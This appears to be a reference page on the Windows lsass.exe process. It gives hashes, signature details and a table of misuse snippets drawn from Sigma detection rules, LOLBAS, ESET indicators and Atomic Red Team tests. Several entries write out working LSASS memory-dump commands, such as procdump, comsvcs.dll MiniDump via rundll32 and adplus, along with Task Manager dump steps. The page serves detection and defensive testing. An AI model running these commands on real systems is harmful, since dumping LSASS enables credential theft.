lsass.exe
- File Path:
C:\WINDOWS\system32\lsass.exe - Description: Local Security Authority Process
Hashes
| Type | Hash |
|---|---|
| MD5 | 03C70933698C6E3E466076DD9C3FAA18 |
| SHA1 | 9FE3BA25E5660C23DFE478D577CFACDE5795870C |
| SHA256 | AA52B2D3DD4B9B47FF4496C0460BDEDDA791354018CF0782B899EF28ACEE8D21 |
| SHA384 | 5242A61DE38AFDF600D3AAEFDFDF9F0B0CBBD72895E2E2E94EBCB6F7D67B13AB7DEECA57055CF21200D20BAD2A7FA814 |
| SHA512 | 790F72185B2B1F9CE427D26329863E7E54DFE9FD5CF74B693B864CE628EDCE34B9F9BFBEA8AFCB55581857385C42EB7AA832CCB18C60A1B709A0EFDD0307FA1D |
| SSDEEP | 768:g9WRRwWrlMDdjX7WsLeLSfsNkKqS/spMs6FUCyy1P7pS:g9mvlMDgsLeLzkKjsysvCbP7pS |
Signature
- Status: Signature verified.
- Serial:
330000023241FB59996DCC4DFF000000000232 - Thumbprint:
FF82BC38E1DA5E596DF374C53E3617F7EDA36B06 - Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
- Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
File Metadata
- Original Filename: lsass.exe
- Product Name: Microsoft Windows Operating System
- Company Name: Microsoft Corporation
- File Version: 10.0.18362.1 (WinBuild.160101.0800)
- Product Version: 10.0.18362.1
- Language: English (United States)
- Legal Copyright: Microsoft Corporation. All rights reserved.
Possible Misuse
The following table contains possible examples of lsass.exe being misused. While lsass.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.
| Source | Source File | Example | License |
|---|---|---|---|
| sigma | zeek_smb_converted_win_transferring_files_with_credential_data.yml | - '\lsass' |
DRL 1.0 |
| sigma | win_lm_namedpipe.yml | - 'lsass' |
DRL 1.0 |
| sigma | win_lsass_access_non_system_account.yml | title: LSASS Access from Non System Account |
DRL 1.0 |
| sigma | win_lsass_access_non_system_account.yml | description: Detects potential mimikatz-like tools accessing LSASS from non system account |
DRL 1.0 |
| sigma | win_lsass_access_non_system_account.yml | ObjectName\|endswith: '\lsass.exe' |
DRL 1.0 |
| sigma | win_suspicious_outbound_kerberos_connection.yml | - '\lsass.exe' |
DRL 1.0 |
| sigma | win_susp_lsass_dump.yml | title: Password Dumper Activity on LSASS |
DRL 1.0 |
| sigma | win_susp_lsass_dump.yml | description: Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN |
DRL 1.0 |
| sigma | win_susp_lsass_dump.yml | ProcessName\|endswith: '\lsass.exe' |
DRL 1.0 |
| sigma | win_susp_lsass_dump_generic.yml | title: Generic Password Dumper Activity on LSASS |
DRL 1.0 |
| sigma | win_susp_lsass_dump_generic.yml | description: Detects process handle on LSASS process with certain access mask |
DRL 1.0 |
| sigma | win_susp_lsass_dump_generic.yml | ObjectName\|endswith: '\lsass.exe' |
DRL 1.0 |
| sigma | win_susp_lsass_dump_generic.yml | - Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it |
DRL 1.0 |
| sigma | win_transferring_files_with_credential_data_via_network_shares.yml | - '\lsass' |
DRL 1.0 |
| sigma | win_alert_lsass_access.yml | title: LSASS Access Detected via Attack Surface Reduction |
DRL 1.0 |
| sigma | win_alert_lsass_access.yml | description: Detects Access to LSASS Process |
DRL 1.0 |
| sigma | win_alert_lsass_access.yml | definition: 'Requirements:Enabled Block credential stealing from the Windows local security authority subsystem (lsass.exe) from Attack Surface Reduction (GUID: 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2)' |
DRL 1.0 |
| sigma | win_alert_lsass_access.yml | Path\|endswith: '\lsass.exe' |
DRL 1.0 |
| sigma | sysmon_password_dumper_lsass.yml | title: Password Dumper Remote Thread in LSASS |
DRL 1.0 |
| sigma | sysmon_password_dumper_lsass.yml | description: Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage. The process in field Process is the malicious program. A single execution can lead to hundreds of events. |
DRL 1.0 |
| sigma | sysmon_password_dumper_lsass.yml | TargetImage\|endswith: '\lsass.exe' |
DRL 1.0 |
| sigma | sysmon_mimikatz_detection_lsass.yml | title: Mimikatz Detection LSASS Access |
DRL 1.0 |
| sigma | sysmon_mimikatz_detection_lsass.yml | description: Detects process access to LSASS which is typical for Mimikatz (0x1000 PROCESS_QUERY_ LIMITED_INFORMATION, 0x0400 PROCESS_QUERY_ INFORMATION "only old |
DRL 1.0 |
| sigma | sysmon_mimikatz_detection_lsass.yml | TargetImage\|endswith: '\lsass.exe' |
DRL 1.0 |
| sigma | sysmon_mimikatz_detection_lsass.yml | - Some security products access LSASS in this way. |
DRL 1.0 |
| sigma | file_event_win_creation_system_file.yml | - '\lsass.exe' |
DRL 1.0 |
| sigma | file_event_win_hack_dumpert.yml | description: Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory |
DRL 1.0 |
| sigma | file_event_win_hktl_createminidump.yml | description: Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine |
DRL 1.0 |
| sigma | file_event_win_hktl_createminidump.yml | - https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass |
DRL 1.0 |
| sigma | file_event_win_hktl_createminidump.yml | TargetFilename\|endswith: '\lsass.dmp' |
DRL 1.0 |
| sigma | file_event_win_lsass_dump.yml | title: LSASS Process Memory Dump Files |
DRL 1.0 |
| sigma | file_event_win_lsass_dump.yml | description: Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials |
DRL 1.0 |
| sigma | file_event_win_lsass_dump.yml | - https://www.google.com/search?q=procdump+lsass |
DRL 1.0 |
| sigma | file_event_win_lsass_dump.yml | - https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf |
DRL 1.0 |
| sigma | file_event_win_lsass_dump.yml | - '\lsass.dmp' |
DRL 1.0 |
| sigma | file_event_win_lsass_dump.yml | - '\lsass.zip' |
DRL 1.0 |
| sigma | file_event_win_lsass_dump.yml | - '\lsass.rar' |
DRL 1.0 |
| sigma | file_event_win_lsass_dump.yml | - '\lsass' |
DRL 1.0 |
| sigma | file_event_win_lsass_memory_dump_file_creation.yml | title: LSASS Memory Dump File Creation |
DRL 1.0 |
| sigma | file_event_win_lsass_memory_dump_file_creation.yml | description: LSASS memory dump creation using operating systems utilities. Procdump will use process name in output file if no name is specified |
DRL 1.0 |
| sigma | file_event_win_lsass_memory_dump_file_creation.yml | TargetFilename\|contains: 'lsass' |
DRL 1.0 |
| sigma | file_event_win_lsass_memory_dump_file_creation.yml | - Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator |
DRL 1.0 |
| sigma | file_event_win_lsass_memory_dump_file_creation.yml | - Dumps of another process that contains lsass in its process name (substring) |
DRL 1.0 |
| sigma | image_load_suspicious_dbghelp_dbgcore_load.yml | description: Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes. Tools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll. As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine. |
DRL 1.0 |
| sigma | image_load_tttracer_mod_load.yml | description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe. |
DRL 1.0 |
| sigma | image_load_unsigned_image_loaded_into_lsass.yml | title: Unsigned Image Loaded Into LSASS Process |
DRL 1.0 |
| sigma | image_load_unsigned_image_loaded_into_lsass.yml | description: Loading unsigned image (DLL, EXE) into LSASS process |
DRL 1.0 |
| sigma | image_load_unsigned_image_loaded_into_lsass.yml | Image\|endswith: '\lsass.exe' |
DRL 1.0 |
| sigma | net_connection_win_suspicious_outbound_kerberos_connection.yml | - '\lsass.exe' |
DRL 1.0 |
| sigma | posh_ps_suspicious_getprocess_lsass.yml | title: PowerShell Get-Process LSASS in ScriptBlock |
DRL 1.0 |
| sigma | posh_ps_suspicious_getprocess_lsass.yml | description: Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity |
DRL 1.0 |
| sigma | posh_ps_suspicious_getprocess_lsass.yml | ScriptBlockText\|contains: 'Get-Process lsass' |
DRL 1.0 |
| sigma | proc_access_win_cred_dump_lsass_access.yml | title: Credentials Dumping Tools Accessing LSASS Memory |
DRL 1.0 |
| sigma | proc_access_win_cred_dump_lsass_access.yml | description: Detects process access LSASS memory which is typical for credentials dumping tools |
DRL 1.0 |
| sigma | proc_access_win_cred_dump_lsass_access.yml | TargetImage\|endswith: '\lsass.exe' |
DRL 1.0 |
| sigma | proc_access_win_cred_dump_lsass_access.yml | - Legitimate software accessing LSASS process for legitimate reason; please add more filters |
DRL 1.0 |
| sigma | proc_access_win_lazagne_cred_dump_lsass_access.yml | description: Detects LSASS process access by LaZagne for credential dumping. |
DRL 1.0 |
| sigma | proc_access_win_lazagne_cred_dump_lsass_access.yml | TargetImage\|endswith: '\lsass.exe' |
DRL 1.0 |
| sigma | proc_access_win_lsass_dump_comsvcs_dll.yml | title: Lsass Memory Dump via Comsvcs DLL |
DRL 1.0 |
| sigma | proc_access_win_lsass_dump_comsvcs_dll.yml | description: Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass. |
DRL 1.0 |
| sigma | proc_access_win_lsass_dump_comsvcs_dll.yml | TargetImage\|endswith: '\lsass.exe' |
DRL 1.0 |
| sigma | proc_access_win_lsass_memdump.yml | title: LSASS Memory Dump |
DRL 1.0 |
| sigma | proc_access_win_lsass_memdump.yml | description: Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up. |
DRL 1.0 |
| sigma | proc_access_win_lsass_memdump.yml | TargetImage\|endswith: '\lsass.exe' |
DRL 1.0 |
| sigma | proc_access_win_lsass_memdump_evasion.yml | title: LSASS Access from White-Listed Processes |
DRL 1.0 |
| sigma | proc_access_win_lsass_memdump_evasion.yml | description: Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without Microsoft Defender interference |
DRL 1.0 |
| sigma | proc_access_win_lsass_memdump_evasion.yml | - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz |
DRL 1.0 |
| sigma | proc_access_win_lsass_memdump_evasion.yml | TargetImage\|endswith: '\lsass.exe' |
DRL 1.0 |
| sigma | proc_access_win_lsass_memdump_evasion.yml | - Unlikely, since these tools shouldn't access lsass.exe at all |
DRL 1.0 |
| sigma | proc_access_win_lsass_memdump_indicators.yml | title: LSASS Memory Access by Tool Named Dump |
DRL 1.0 |
| sigma | proc_access_win_lsass_memdump_indicators.yml | - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz |
DRL 1.0 |
| sigma | proc_access_win_lsass_memdump_indicators.yml | TargetImage\|endswith: '\lsass.exe' |
DRL 1.0 |
| sigma | proc_access_win_lsass_memdump_indicators.yml | - Rare programs that contain the word dump in their name and access lsass |
DRL 1.0 |
| sigma | proc_access_win_mimikatz_trough_winrm.yml | description: Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe. |
DRL 1.0 |
| sigma | proc_access_win_mimikatz_trough_winrm.yml | TargetImage\|endswith: '\lsass.exe' |
DRL 1.0 |
| sigma | proc_access_win_pypykatz_cred_dump_lsass_access.yml | description: Detects LSASS process access by pypykatz for credential dumping. |
DRL 1.0 |
| sigma | proc_access_win_pypykatz_cred_dump_lsass_access.yml | TargetImage\|endswith: '\lsass.exe' |
DRL 1.0 |
| sigma | proc_access_win_susp_proc_access_lsass.yml | title: Suspicious GrantedAccess Flags on LSASS Access |
DRL 1.0 |
| sigma | proc_access_win_susp_proc_access_lsass.yml | description: Detects process access to LSASS memory with suspicious access flags |
DRL 1.0 |
| sigma | proc_access_win_susp_proc_access_lsass.yml | TargetImage\|endswith: '\lsass.exe' |
DRL 1.0 |
| sigma | proc_access_win_susp_proc_access_lsass.yml | - 'C:\Windows\System32\lsass.exe' |
DRL 1.0 |
| sigma | proc_access_win_susp_proc_access_lsass.yml | - Legitimate software accessing LSASS process for legitimate reason |
DRL 1.0 |
| sigma | proc_access_win_susp_proc_access_lsass_susp_source.yml | title: LSASS Access from Program in Suspicious Folder |
DRL 1.0 |
| sigma | proc_access_win_susp_proc_access_lsass_susp_source.yml | description: Detects process access to LSASS memory with suspicious access flags and from a suspicious folder |
DRL 1.0 |
| sigma | proc_access_win_susp_proc_access_lsass_susp_source.yml | TargetImage\|endswith: '\lsass.exe' |
DRL 1.0 |
| sigma | proc_access_win_susp_proc_access_lsass_susp_source.yml | - Legitimate software accessing LSASS process for legitimate reason |
DRL 1.0 |
| sigma | proc_creation_win_abusing_debug_privilege.yml | - '\lsass.exe' |
DRL 1.0 |
| sigma | proc_creation_win_credential_access_via_password_filter.yml | description: Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS |
DRL 1.0 |
| sigma | proc_creation_win_hack_dumpert.yml | description: Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory |
DRL 1.0 |
| sigma | proc_creation_win_hktl_createminidump.yml | description: Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine |
DRL 1.0 |
| sigma | proc_creation_win_hktl_createminidump.yml | - https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass |
DRL 1.0 |
| sigma | proc_creation_win_lsass_dump.yml | title: LSASS Memory Dumping |
DRL 1.0 |
| sigma | proc_creation_win_lsass_dump.yml | description: Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials. Identifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials. |
DRL 1.0 |
| sigma | proc_creation_win_lsass_dump.yml | - 'lsass' |
DRL 1.0 |
| sigma | proc_creation_win_lsass_dump.yml | CommandLine\|contains: 'lsass' |
DRL 1.0 |
| sigma | proc_creation_win_procdump_evasion.yml | - 'lsass' |
DRL 1.0 |
| sigma | proc_creation_win_procdump_evasion.yml | - 'copy lsass.exe_' # procdump default pattern e.g. lsass.exe_220111_085234.dmp |
DRL 1.0 |
| sigma | proc_creation_win_procdump_evasion.yml | - 'move lsass.exe_' # procdump default pattern e.g. lsass.exe_220111_085234.dmp |
DRL 1.0 |
| sigma | proc_creation_win_proc_wrong_parent.yml | - '\lsass.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_lsass_clone.yml | title: Suspicious LSASS Process Clone |
DRL 1.0 |
| sigma | proc_creation_win_susp_lsass_clone.yml | description: Detects a suspicious LSASS process process clone that could be a sign of process dumping activity |
DRL 1.0 |
| sigma | proc_creation_win_susp_lsass_clone.yml | Image\|endswith: '\Windows\System32\lsass.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_lsass_clone.yml | ParentImage\|endswith: '\Windows\System32\lsass.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_powershell_getprocess_lsass.yml | title: PowerShell Get-Process LSASS |
DRL 1.0 |
| sigma | proc_creation_win_susp_powershell_getprocess_lsass.yml | description: Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity |
DRL 1.0 |
| sigma | proc_creation_win_susp_powershell_getprocess_lsass.yml | - 'Get-Process lsass' |
DRL 1.0 |
| sigma | proc_creation_win_susp_procdump_lsass.yml | title: Suspicious Use of Procdump on LSASS |
DRL 1.0 |
| sigma | proc_creation_win_susp_procdump_lsass.yml | description: Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable. |
DRL 1.0 |
| sigma | proc_creation_win_susp_procdump_lsass.yml | CommandLine\|contains: ' lsass' |
DRL 1.0 |
| sigma | proc_creation_win_susp_procdump_lsass.yml | - Unlikely, because no one should dump an lsass process memory |
DRL 1.0 |
| sigma | proc_creation_win_susp_trolleyexpress_procdump.yml | description: Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory |
DRL 1.0 |
| sigma | proc_creation_win_susp_trolleyexpress_procdump.yml | # We assume that the lsass.exe process has a process ID that's between 700 and 999 and the dumper uses just the PID as parameter |
DRL 1.0 |
| sigma | proc_creation_win_system_exe_anomaly.yml | - '\lsass.exe' |
DRL 1.0 |
| sigma | proc_creation_win_tttracer_mod_load.yml | description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe. |
DRL 1.0 |
| sigma | proc_creation_win_xordump.yml | - ' -process lsass.exe ' |
DRL 1.0 |
| sigma | registry_event_add_local_hidden_user.yml | Image\|endswith: 'lsass.exe' |
DRL 1.0 |
| sigma | registry_event_silentprocessexit.yml | - https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/ |
DRL 1.0 |
| sigma | registry_event_silentprocessexit_lsass.yml | title: SilentProcessExit Monitor Registrytion for LSASS |
DRL 1.0 |
| sigma | registry_event_silentprocessexit_lsass.yml | description: Detects changes to the Registry in which a monitor program gets registered to dump process memory of the lsass.exe process memory |
DRL 1.0 |
| sigma | registry_event_silentprocessexit_lsass.yml | - https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/ |
DRL 1.0 |
| sigma | registry_event_silentprocessexit_lsass.yml | TargetObject\|contains: 'Microsoft\Windows NT\CurrentVersion\SilentProcessExit\lsass.exe' |
DRL 1.0 |
| sigma | registry_event_susp_lsass_dll_load.yml | title: DLL Load via LSASS |
DRL 1.0 |
| sigma | registry_event_susp_lsass_dll_load.yml | description: Detects a method to load DLL via LSASS process using an undocumented Registry key |
DRL 1.0 |
| sigma | sysmon_accessing_winapi_in_powershell_credentials_dumping.yml | description: Detects Accessing to lsass.exe by Powershell |
DRL 1.0 |
| sigma | sysmon_accessing_winapi_in_powershell_credentials_dumping.yml | TargetImage\|endswith: '\lsass.exe' |
DRL 1.0 |
| LOLBAS | comsvcs.yml | Usecase: Dump Lsass.exe process memory to retrieve credentials. |
|
| LOLBAS | Adplus.yml | - Command: adplus.exe -hang -pn lsass.exe -o c:\users\mr.d0x\output\folder -quiet |
|
| LOLBAS | Adplus.yml | Description: Creates a memory dump of the lsass process |
|
| LOLBAS | Adplus.yml | - Link: https://blog.thecybersecuritytutor.com/adplus-debugging-tool-lsass-dump/ |
|
| LOLBAS | Sqldumper.yml | Usecase: Dump LSASS.exe to Mimikatz compatible dump using PID. |
|
| malware-ioc | exchange_exploitation | \|af421b1f5a08499e130d24f448f6d79f7c76af2b\|Win64/Riskware.LsassDumper.J \|LSASS dumper used by Tonto Team |
© ESET 2014-2018 |
| malware-ioc | famoussparrow | \|76C430B55F180A85F4E1A1E40E4A2EA37DB97599\|Win64/Kryptik.BSQ\|Lsass dumper |
© ESET 2014-2018 |
| malware-ioc | nukesped_lazarus | .lsass.dll``{:.highlight .language-cmhg} |
© ESET 2014-2018 |
| atomic-red-team | index.md | - T1003.001 LSASS Memory | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #2: Dump LSASS.exe Memory using ProcDump [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #3: Dump LSASS.exe Memory using comsvcs.dll [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #4: Dump LSASS.exe Memory using direct system calls and API unhooking [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #5: Dump LSASS.exe Memory using NanoDump [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #6: Dump LSASS.exe Memory using Windows Task Manager [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #8: LSASS read with pypykatz [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #9: Dump LSASS.exe Memory using Out-Minidump.ps1 [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #10: Create Mini Dump of LSASS.exe using ProcDump [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #12: Dump LSASS with .Net 5 createdump.exe [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #13: Dump LSASS.exe using imported Microsoft DLLs [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - T1547.008 LSASS Driver CONTRIBUTE A TEST | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #1: Masquerading as Windows LSASS process [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - T1003.001 LSASS Memory | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #2: Dump LSASS.exe Memory using ProcDump [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #3: Dump LSASS.exe Memory using comsvcs.dll [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #4: Dump LSASS.exe Memory using direct system calls and API unhooking [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #5: Dump LSASS.exe Memory using NanoDump [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #6: Dump LSASS.exe Memory using Windows Task Manager [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #8: LSASS read with pypykatz [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #9: Dump LSASS.exe Memory using Out-Minidump.ps1 [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #10: Create Mini Dump of LSASS.exe using ProcDump [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #12: Dump LSASS with .Net 5 createdump.exe [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #13: Dump LSASS.exe using imported Microsoft DLLs [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - T1547.008 LSASS Driver CONTRIBUTE A TEST | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #1: Masquerading as Windows LSASS process [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | matrix.md | | | Shared Modules CONTRIBUTE A TEST | DLL Search Order Hijacking | Dylib Hijacking CONTRIBUTE A TEST | Deobfuscate/Decode Files or Information | LSASS Memory | System Checks | | Remote Data Staging CONTRIBUTE A TEST | | One-Way Communication CONTRIBUTE A TEST | | | MIT License. © 2018 Red Canary |
| atomic-red-team | matrix.md | | | | Image File Execution Options Injection | LSASS Driver CONTRIBUTE A TEST | Dynamic Linker Hijacking | SAML Tokens | | | | | | | | MIT License. © 2018 Red Canary |
| atomic-red-team | matrix.md | | | | LSASS Driver CONTRIBUTE A TEST | Local Accounts | Executable Installer File Permissions Weakness CONTRIBUTE A TEST | Steal Application Access Token CONTRIBUTE A TEST | | | | | | | | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-matrix.md | | | Windows Command Shell | Default Accounts | Domain Trust Modification CONTRIBUTE A TEST | Disable Windows Event Logging | LSASS Memory | System Information Discovery | | Man-in-the-Middle CONTRIBUTE A TEST | | Multi-hop Proxy | Stored Data Manipulation CONTRIBUTE A TEST | | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-matrix.md | | | | Image File Execution Options Injection | LSASS Driver CONTRIBUTE A TEST | Execution Guardrails CONTRIBUTE A TEST | Password Spraying | | | | | Remote Access Software | | | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-matrix.md | | | | LSASS Driver CONTRIBUTE A TEST | Local Accounts | Exploitation for Defense Evasion CONTRIBUTE A TEST | Private Keys | | | | | Standard Encoding | | | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | # T1003.001 - LSASS Memory | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | <blockquote>Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement using Use Alternate Authentication Material. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | * procdump -ma lsass.exe lsass_dump |
MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | - Atomic Test #2 - Dump LSASS.exe Memory using ProcDump | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | - Atomic Test #3 - Dump LSASS.exe Memory using comsvcs.dll | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | - Atomic Test #4 - Dump LSASS.exe Memory using direct system calls and API unhooking | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | - Atomic Test #5 - Dump LSASS.exe Memory using NanoDump | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | - Atomic Test #6 - Dump LSASS.exe Memory using Windows Task Manager | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | - Atomic Test #8 - LSASS read with pypykatz | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | - Atomic Test #9 - Dump LSASS.exe Memory using Out-Minidump.ps1 | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | - Atomic Test #10 - Create Mini Dump of LSASS.exe using ProcDump | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | - Atomic Test #12 - Dump LSASS with .Net 5 createdump.exe | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | - Atomic Test #13 - Dump LSASS.exe using imported Microsoft DLLs | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | ## Atomic Test #2 - Dump LSASS.exe Memory using ProcDump | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | #{procdump_exe} -accepteula -ma lsass.exe #{output_file} | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | ## Atomic Test #3 - Dump LSASS.exe Memory using comsvcs.dll | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | ## Atomic Test #4 - Dump LSASS.exe Memory using direct system calls and API unhooking | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | ## Atomic Test #5 - Dump LSASS.exe Memory using NanoDump | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | ## Atomic Test #6 - Dump LSASS.exe Memory using Windows Task Manager | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | 2. Select lsass.exe: | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | If lsass.exe is not visible, select “Show processes from all users”. This will allow you to observe execution of lsass.exe | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | 3. Dump lsass.exe memory: | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | Right-click on lsass.exe in Task Manager. Select “Create Dump File”. The following dialog will show you the path to the saved file. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | | input_file | Path of the Lsass dump | Path | %tmp%\lsass.DMP| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | ##### Description: Lsass dump must exist at specified location (#{input_file}) | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | Write-Host “Create the lsass dump manually using the steps in the previous test (Dump LSASS.exe Memory using Windows Task Manager)” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | ## Atomic Test #8 - LSASS read with pypykatz | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | Parses secrets hidden in the LSASS process with python. Similar to mimikatz’s sekurlsa:: | MIT License. © 2018 Red Canary |
